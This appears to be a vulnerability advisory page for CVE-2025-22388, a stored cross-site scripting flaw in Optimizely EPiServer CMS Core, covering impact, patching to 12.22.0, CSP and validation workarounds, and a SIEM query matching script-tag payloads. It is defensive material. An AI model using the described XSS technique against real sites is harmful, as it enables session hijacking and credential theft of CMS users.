CVE-2025-22388
📋 TL;DR
A stored cross-site scripting (XSS) vulnerability in Optimizely EPiServer CMS Core allows attackers to inject malicious JavaScript into content, links, and file uploads. This affects all users of the CMS before version 12.22.0, potentially compromising anyone viewing the injected content.
💻 Affected Systems
- Optimizely EPiServer CMS Core
📦 What is this software?
Optimizely Cms by Optimizely
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal session cookies, redirect users to malicious sites, perform actions as authenticated users, or compromise administrator accounts leading to full system takeover.
Likely Case
Attackers inject malicious scripts that steal user credentials or session tokens when users view compromised content pages.
If Mitigated
With proper input validation and output encoding, the risk is reduced to minimal, though the vulnerability still exists in the codebase.
🎯 Exploit Status
Requires authenticated access to content editing features. Exploitation is straightforward once access is obtained.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 12.22.0
Vendor Advisory: https://support.optimizely.com/hc/en-us/articles/33182047260557-Content-Management-System-CMS-Security-Advisory-CMS-2025-01
Restart Required: Yes
Instructions:
1. Backup your CMS installation and database. 2. Update to EPiServer.CMS.Core version 12.22.0 or later via NuGet package manager. 3. Restart the application pool or web server. 4. Test all content editing functionality.
🔧 Temporary Workarounds
Input Validation Filter
allImplement server-side input validation to sanitize HTML content in content editing, links, and file upload fields.
Implement custom validation filters in ASP.NET MVC controllers or use AntiXSS library
Content Security Policy
allImplement strict Content Security Policy headers to limit script execution.
Add Content-Security-Policy header with script-src 'self' directive
🧯 If You Can't Patch
- Implement web application firewall (WAF) rules to block XSS payloads in content submissions
- Disable or restrict content editing permissions to trusted administrators only
🔍 How to Verify
Check if Vulnerable:
Check the version of EPiServer.CMS.Core in your project's packages.config or .csproj file. If version is below 12.22.0, you are vulnerable.Check Version:
Check packages.config for <package id="EPiServer.CMS.Core" version="X.X.X" /> or use NuGet Package Manager Console: Get-Package -ProjectName YourProjectName | Where-Object {$_.Id -eq 'EPiServer.CMS.Core'}Verify Fix Applied:
After updating, verify the EPiServer.CMS.Core package version is 12.22.0 or higher and test content editing features with XSS payloads.📡 Detection & Monitoring
Log Indicators:
- Unusual content updates with script tags or JavaScript code
- Multiple failed content validation attempts
- Administrator account performing unexpected content edits
Network Indicators:
- HTTP requests containing script tags in POST data to content editing endpoints
- Unusual outbound connections from CMS to external domains after content viewing
SIEM Query:
source="web_server" AND (uri_path="/episerver/cms/edit" OR uri_path="/episerver/cms/content") AND (request_body CONTAINS "<script>" OR request_body CONTAINS "javascript:")